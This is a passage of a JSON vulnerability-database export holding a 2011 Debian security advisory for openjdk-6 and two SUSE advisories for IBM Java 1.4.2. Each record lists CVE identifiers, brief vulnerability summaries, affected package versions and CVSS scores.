{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:37", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-jdk_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-jdk", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-jre-headless_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-dbg_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-jre-lib_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-jre_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-demo_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-demo", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-doc_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-doc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "openjdk-6-source_6b18-1.8.10-0~lenny2_all.deb", "packageName": "openjdk-6-source", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "6b18-1.8.10-0~lenny2", "arch": "all", "packageFilename": "icedtea6-plugin_6b18-1.8.10-0~lenny2_all.deb", "packageName": "icedtea6-plugin", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2358-1 security@debian.org\nhttp://www.debian.org/security/ \nDecember 05, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openjdk-6\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0862 CVE-2011-0864 CVE-2011-0865 CVE-2011-0867 CVE-2011-0868 CVE-2011-0869 CVE-2011-0871 CVE-2011-3389 CVE-2011-3521 CVE-2011-3544 CVE-2011-3547 CVE-2011-3548 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3556 CVE-2011-3557 CVE-2011-3560\n\nSeveral vulnerabilities have been discovered in OpenJDK, an\nimplementation of the Java platform. This combines the two previous\nopenjdk-6 advisories, DSA-2311-1 and DSA-2356-1.\n\nCVE-2011-0862\n\tInteger overflow errors in the JPEG and font parser allow\n\tuntrusted code (including applets) to elevate its privileges.\n\nCVE-2011-0864\n\tHotspot, the just-in-time compiler in OpenJDK, mishandled\n\tcertain byte code instructions, allowing untrusted code\n\t(including applets) to crash the virtual machine.\n\nCVE-2011-0865\n\tA race condition in signed object deserialization could\n\tallow untrusted code to modify signed content, apparently\n\tleaving its signature intact.\n\nCVE-2011-0867\n\tUntrusted code (including applets) could access information\n\tabout network interfaces which was not intended to be public.\n\t(Note that the interface MAC address is still available to\n\tuntrusted code.)\n\nCVE-2011-0868\n\tA float-to-long conversion could overflow, , allowing\n\tuntrusted code (including applets) to crash the virtual\n\tmachine.\n\nCVE-2011-0869\n\tUntrusted code (including applets) could intercept HTTP\n\trequests by reconfiguring proxy settings through a SOAP\n\tconnection.\n\nCVE-2011-0871\n\tUntrusted code (including applets) could elevate its\n\tprivileges through the Swing MediaTracker code.\n\nCVE-2011-3389\n\tThe TLS implementation does not guard properly against certain\n\tchosen-plaintext attacks when block ciphers are used in CBC\n\tmode.\n\nCVE-2011-3521\n\tThe CORBA implementation contains a deserialization\n\tvulnerability in the IIOP implementation, allowing untrusted\n\tJava code (such as applets) to elevate its privileges.\n\nCVE-2011-3544\n\tThe Java scripting engine lacks necessary security manager\n\tchecks, allowing untrusted Java code (such as applets) to\n\televate its privileges.\n\nCVE-2011-3547\n\tThe skip() method in java.io.InputStream uses a shared buffer,\n\tallowing untrusted Java code (such as applets) to access data\n\tthat is skipped by other code.\n\nCVE-2011-3548\n\tThe java.awt.AWTKeyStroke class contains a flaw which allows\n\tuntrusted Java code (such as applets) to elevate its\n\tprivileges.\n\nCVE-2011-3551\n\tThe Java2D C code contains an integer overflow which results\n\tin a heap-based buffer overflow, potentially allowing\n\tuntrusted Java code (such as applets) to elevate its\n\tprivileges.\n\nCVE-2011-3552\n\tMalicous Java code can use up an excessive amount of UDP\n\tports, leading to a denial of service.\n\nCVE-2011-3553\n\tJAX-WS enables stack traces for certain server responses by\n\tdefault, potentially leaking sensitive information.\n\nCVE-2011-3554\n\tJAR files in pack200 format are not properly checked for\n\terrors, potentially leading to arbitrary code execution when\n\tunpacking crafted pack200 files.\n\nCVE-2011-3556\n\tThe RMI Registry server lacks access restrictions on certain\n\tmethods, allowing a remote client to execute arbitary code.\n\nCVE-2011-3557\n\tThe RMI Registry server fails to properly restrict privileges\n\tof untrusted Java code, allowing RMI clients to elevate their\n\tprivileges on the RMI Registry server.\n\nCVE-2011-3560\n\tThe com.sun.net.ssl.HttpsURLConnection class does not perform\n\tproper security manager checks in the setSSLSocketFactory()\n\tmethod, allowing untrusted Java code to bypass security policy\n\trestrictions.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 6b18-1.8.10-0~lenny1.\n\nWe recommend that you upgrade your openjdk-6 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2011-12-05T19:27:12", "title": "[SECURITY] [DSA 2358-1] openjdk-6 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:37", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-0865", "CVE-2011-3557", "CVE-2011-3551", "CVE-2011-0868", "CVE-2011-0869", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-0867", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-0864", "CVE-2011-3552", "CVE-2011-0862", "CVE-2011-0871"], "modified": "2011-12-05T19:27:12", "id": "DEBIAN:DSA-2358-1:F21E5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00236.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:25:43", "references": ["http://download.novell.com/patch/finder/?keywords=051986200790170b4eac52e27d1e7141", "https://bugzilla.novell.com/739256"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.ia64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.ia64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.ia64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.s390x.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-plugin-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ppc", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.10.1.ppc.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.s390x.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-plugin-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.s390x.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.ia64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.s390x.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.10.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.4.2_sr13.11-0.10.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.10.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}], "description": "IBM Java 1.4.2 SR13 FP11 has been released and contains\n various security fixes.\n\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <a rel=\"nofollow\" href=\"http://www.mozilla.org/en-US/firefox/10.0/releasenotes/\">http://www.mozilla.org/en-US/firefox/10.0/releasenotes/</a>\n <<a rel=\"nofollow\" href=\"http://www.mozilla.org/en-US/firefox/10.0/releasenotes/\">http://www.mozilla.org/en-US/firefox/10.0/releasenotes/</a>>\n\n (CVEs fixed: CVE-2011-3547 CVE-2011-3548 CVE-2011-3549\n CVE-2011-3552 CVE-2011-3545 CVE-2011-3556 CVE-2011-3557\n CVE-2011-3389 CVE-2011-3560 )\n\n Security Issues:\n\n * CVE-2011-3389\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389</a>\n >\n * CVE-2011-3545\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545</a>\n >\n * CVE-2011-3547\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547</a>\n >\n * CVE-2011-3548\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548</a>\n >\n * CVE-2011-3549\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549</a>\n >\n * CVE-2011-3552\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552</a>\n >\n * CVE-2011-3556\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556</a>\n >\n * CVE-2011-3557\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557</a>\n >\n * CVE-2011-3560\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560</a>\n >\n\n\n", "edition": 1, "reporter": "Suse", "published": "2012-01-26T04:08:11", "title": "Security update for IBM Java 1.4.2 (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3549", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3389", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552"], "modified": "2012-01-26T04:08:11", "id": "SUSE-SU-2012:0122-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:45:45", "references": ["http://download.novell.com/patch/finder/?keywords=c0c632466d75a1ac53d2ceaf2d983053", "http://download.novell.com/patch/finder/?keywords=77471aa6472b33cde43cae36b3b3fef0", "https://bugzilla.novell.com/739256"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.ia64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.ia64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ppc64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.5.1.ppc64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ppc64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.ppc64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-plugin-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.5.1.s390x.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.5.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise for SAP Applications", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.3.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-sap-1.4.2_sr13.11-0.3.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-sap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ia64", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.5.1.ia64.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-plugin-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.s390x.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.3.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-sap-devel-1.4.2_sr13.11-0.3.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-sap-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "s390x", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.s390x.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.x86_64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-jdbc-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.3.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-sap-1.4.2_sr13.11-0.3.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-sap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "ppc64", "packageFilename": "java-1_4_2-ibm-1.4.2_sr13.11-0.5.1.ppc64.rpm", "packageName": "java-1_4_2-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise for SAP Applications", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.3.1", "arch": "x86_64", "packageFilename": "java-1_4_2-ibm-sap-devel-1.4.2_sr13.11-0.3.1.x86_64.rpm", "packageName": "java-1_4_2-ibm-sap-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-plugin-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.4.2_sr13.11-0.5.1", "arch": "i586", "packageFilename": "java-1_4_2-ibm-devel-1.4.2_sr13.11-0.5.1.i586.rpm", "packageName": "java-1_4_2-ibm-devel", "operator": "lt"}], "description": "IBM Java 1.4.2 SR13 FP11 has been released and contains\n various security fixes.\n\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n (CVEs fixed: CVE-2011-3547 CVE-2011-3548 CVE-2011-3549\n CVE-2011-3552 CVE-2011-3545 CVE-2011-3556 CVE-2011-3557\n CVE-2011-3389 CVE-2011-3560 )\n\n Security Issues:\n\n * CVE-2011-3389\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389</a>\n >\n * CVE-2011-3545\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545</a>\n >\n * CVE-2011-3547\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547</a>\n >\n * CVE-2011-3548\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548</a>\n >\n * CVE-2011-3549\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549</a>\n >\n * CVE-2011-3552\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552</a>\n >\n * CVE-2011-3556\n <<a rel=\"nofollow\" 